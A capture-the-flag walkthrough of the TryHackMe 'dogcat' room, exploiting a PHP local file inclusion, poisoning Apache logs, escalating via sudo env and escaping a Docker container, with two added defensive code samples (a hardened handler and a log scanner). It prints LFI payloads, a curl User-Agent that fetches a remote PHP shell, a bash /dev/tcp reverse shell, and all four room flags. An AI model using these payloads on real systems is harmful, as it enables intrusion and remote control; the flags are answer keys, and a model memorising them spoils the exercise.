Tryhackme - dogcat


In this walkthrough, we will be going through the dogcat room from Tryhackme. This is a medium rated room on the platform which consists of a PHP application for viewing pictures of dogs and cats; it can be exploited via LFI, after which you have to break out of a Docker container to root the box. Overall, it is a fun room that will have you pulling your hair out in frustration. On that note, let’s get started.

dogcat

Machine Info:

Title: dogcat
IP address: 10.10.156.142
Difficulty: Medium
Objective: I made a website where you can look at pictures of dogs and/or cats! Exploit a PHP application via LFI and break out of a docker container.

Phase 1 – Enumeration

  • Checking whether the machine is live.

pinging the machine

  • The nmap scan shows two ports open – 80 (HTTP) and 22 (SSH) – with 53 (DNS) reported as filtered.

wh1terose@fsociety:~$ sudo nmap -sS -sV 10.10.156.142

Starting Nmap 7.80 ( https://nmap.org ) at 2023-04-19 21:28 IST

Host is up (0.25s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.93 seconds

nmap scan

  • Checking out the website running on port 80. Found an application that displays dog or cat pictures depending on our choice.

Website on port 80

  • Fired up gobuster to gather some directory info. Nothing useful came out of it.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.156.142/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.156.142/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/04/19 21:32:05 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 278]
/.hta                 (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/cats                 (Status: 301) [Size: 313] [--> http://10.10.156.142/cats/]
/index.php            (Status: 200) [Size: 418]                                 
/server-status        (Status: 403) [Size: 278]                                 
                                                                                
===============================================================
2023/04/19 21:34:08 Finished
===============================================================

gobuster scan

Forbidden error

  • Found the ?view= parameter, which can be exploited via LFI.

LFI found

  • Tried some LFI payloads. The inputs were wrapped in base64 encoding to read the application's source.

http://10.10.156.142/?view=dog/../../../../../../etc/passwd

/etc/passwd

  • First, gathered information about the function running in the background. Found a base64 encoded string which, decoded with CyberChef, gives the PHP source code and a better understanding of the application.

http://10.10.156.142/?view=php://filter/convert.base64-encode/resource=./dog/../index

base 64 string


<!DOCTYPE HTML>
<html>

<head>
    <title>dogcat</title>
    <link rel="stylesheet" type="text/css" href="/style.css">
</head>

<body>
    <h1>dogcat</h1>
    <i>a gallery of various dogs or cats</i>

    <div>
        <h2>What would you like to see?</h2>
        <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
        <?php
            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
            $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
            if(isset($_GET['view'])) {
                if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
                    echo 'Here you go!';
                    include $_GET['view'] . $ext;
                } else {
                    echo 'Sorry, only dogs or cats are allowed.';
                }
            }
        ?>
    </div>
</body>

</html>

cyberchef base64 decode
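The root cause is visible in the decoded source: containsStr() only checks that "dog" or "cat" appears somewhere in the string, and both the path and the extension are taken from the request, so `dog/../../etc/passwd&ext=` sails through into include(). As an added example (not the room's code), here is a hardened version of the same handler. It assumes the original layout, with dog.php and cat.php sitting in the web root next to index.php.

```php
<?php
// Added example, not the dogcat room's own code: a hardened ?view= handler.
// Assumes dog.php and cat.php live next to this file, as in the original app.
declare(strict_types=1);

// Allow-list: the request selects a key, never a path. No user-controlled
// string is ever concatenated into include(), so php:// wrappers and ../ are
// impossible, and the ?ext= override simply no longer exists.
const VIEWS = [
    'dog' => __DIR__ . '/dog.php',
    'cat' => __DIR__ . '/cat.php',
];

function resolveView(?string $view): ?string
{
    // Exact key match. The original substring check (containsStr) accepted
    // anything that merely mentioned "dog" or "cat".
    if ($view === null || !array_key_exists($view, VIEWS)) {
        return null;
    }

    // Defence in depth: even a file from the allow-list must resolve to a
    // real file inside this directory. realpath() also strips any ../ .
    $root = realpath(__DIR__);
    $real = realpath(VIEWS[$view]);
    if ($root === false || $real === false
        || strpos($real, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

$path = resolveView($_GET['view'] ?? null);
if ($path === null) {
    http_response_code(400);
    echo 'Sorry, only dogs or cats are allowed.';
} else {
    echo 'Here you go!';
    include $path;
}
```

With this in place the php://filter trick used above fails at the allow-list, and the /etc/passwd and access.log reads fail the same way, which also closes the log-poisoning route to code execution.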

  • Got the contents of the /etc/passwd file using the following payload.

http://10.10.156.142/?view=dog/../../../../../etc/passwd&ext=

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

cat /etc/passwd

  • Accessing the Apache server logs.

http://10.10.156.142/?view=dog/../../../../../var/log/apache2/access.log&ext=

apache log file

  • Now we will plant a PHP payload in the access log through the User-Agent header of a GET request, and then trigger it via the browser using the LFI. The connection will be caught by a netcat listener.

wh1terose@fsociety:~/CTF/TryHackme/dogcat$ curl -A "<?php file_put_contents('revshell.php',file_get_contents('http://10.18.11.103:8000/revshell.php'))?>" -s http://10.10.156.142
<!DOCTYPE HTML>
<html>

<head>
    <title>dogcat</title>
    <link rel="stylesheet" type="text/css" href="/style.css">
</head>

<body>
    <h1>dogcat</h1>
    <i>a gallery of various dogs or cats</i>

    <div>
        <h2>What would you like to see?</h2>
        <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
            </div>
</body>

</html>

python http server

getting response
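From the defender's side, every step of the chain above leaves a trace in the very log that gets poisoned. As an added example (not part of the original post), this small PHP CLI scanner runs over a few constructed access-log lines and flags the patterns this room relies on: php:// wrappers and ../ in ?view=, an empty ?ext= override, and PHP tags in the User-Agent field.

```php
<?php
// Added example, not from the original post: flag the dogcat attack patterns
// in Apache combined-format access-log lines. The log lines are constructed.
declare(strict_types=1);

const SAMPLE_LOG = <<<'LOG'
10.0.0.5 - - [19/Apr/2023:16:05:01 +0000] "GET /?view=dog HTTP/1.1" 200 418 "-" "Mozilla/5.0"
10.0.0.5 - - [19/Apr/2023:16:05:09 +0000] "GET /?view=php://filter/convert.base64-encode/resource=./dog/../index HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.0.5 - - [19/Apr/2023:16:06:40 +0000] "GET /?view=dog/../../../../../etc/passwd&ext= HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.5 - - [19/Apr/2023:16:07:12 +0000] "GET / HTTP/1.1" 200 418 "-" "<?php phpinfo(); ?>"
LOG;

/**
 * Return [line number => list of rule names] for every line that matches
 * at least one rule. Each rule is anchored to the request or User-Agent
 * field so a benign referrer cannot trigger the request rules.
 */
function scanAccessLog(string $log): array
{
    $rules = [
        'php wrapper in request'  => '~"(?:GET|POST) [^"]*php://~i',
        'directory traversal'     => '~"(?:GET|POST) [^"]*(?:\.\./|%2e%2e%2f)~i',
        'empty ext override'      => '~"(?:GET|POST) [^"]*[?&]ext=(?:&|\s)~i',
        'php tag in user-agent'   => '~"[^"]*<\?php[^"]*"\s*$~i',
    ];
    $findings = [];
    foreach (explode("\n", trim($log)) as $i => $line) {
        foreach ($rules as $name => $re) {
            if (preg_match($re, $line) === 1) {
                $findings[$i + 1][] = $name;
            }
        }
    }
    return $findings;
}

foreach (scanAccessLog(SAMPLE_LOG) as $lineNo => $hits) {
    printf("line %d: %s\n", $lineNo, implode(', ', $hits));
}
```

Line 1 is the legitimate request and produces no finding; lines 2 to 4 each trip one or more rules, which is the sequence a SOC analyst would expect to see before the reverse shell connects.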

Phase 2 – Initial Access:

  • Got shell access using the uploaded PHP reverse shell.

reverseshell.php

netcat listener

  • Found our first flag in the /src folder inside /var/www/html.

flag 1

  • Got the second flag in the /var/www folder.

flag 2

Phase 3 – Privilege Escalation

  • Checking for any sudo misconfigurations. Found that the env binary can be run as root without a password. Next, exploited it to get a root shell using GTFOBins.

$ sudo -l
Matching Defaults entries for www-data on 119433eddedd:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on 119433eddedd:
    (root) NOPASSWD: /usr/bin/env

sudo -l

GTFObins env

  • Got our root shell. Now looking for flags; found the third one in the root folder.

$ sudo env /bin/sh

$ id
uid=0(root) gid=0(root) groups=0(root)

$ cd /root
$ ls
flag3.txt
$ cat flag3.txt
THM{D1ff3r3nt_3nv1ronments_874112}

flag 3

  • Next, to get our fourth flag, we have to break out of the container we are in. To do that, we will use the backup.sh script, replacing its content with our reverse shell. That got us out of the container and gave us the final flag.

ls
backup.sh
backup.tar
root
cat backup.sh
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container
echo "#!/bin/bash" > backup.sh
echo "bash -i >& /dev/tcp/10.18.11.103/4444 0>&1" >> backup.sh
cat backup.sh
#!/bin/bash
bash -i >& /dev/tcp/10.18.11.103/4444 0>&1

reverse shell for root

root flag

Task 1 – Dogcat

Question 1 – What is flag 1?

THM{Th1s_1s_N0t_4_Catdog_ab67edfa}

Question 2 – What is flag 2?

THM{LF1_t0_RC3_aec3fb}

Question 3 – What is flag 3?

THM{D1ff3r3nt_3nv1ronments_874112}

Question 4 – What is flag 4?

THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d}


Conclusion:


So that was “dogcat” for you. This room was a bit annoying on the enumeration part, but I think that’s how it has to be. We started off with a regular nmap scan and found 80 (HTTP) and 22 (SSH). On port 80 we found an application which lets us choose between dogs and cats and, on choosing one, displays images of it. Next, we fired up gobuster on the server, which revealed a cats directory, though I was unable to access it. While viewing the images, we found that the view parameter can be exploited for LFI. We tried some random LFI payloads but had no luck. Next, we gathered information about the application by encoding the queries in base64, found the underlying implementation, and used that to dump the /etc/passwd file. Then we dumped the Apache log file for further information. Moving on, we uploaded a reverse shell using curl and got a shell on our netcat listener. With that shell, we were able to get the first 2 flags. For the privilege escalation part, we exploited the env binary to get a root shell and the 3rd flag. For the root flag, we had to break out of the container. For that, we used backup.sh to execute our reverse shell, got a root shell outside the container, and collected the root flag along with the divorce papers my wife left for me.
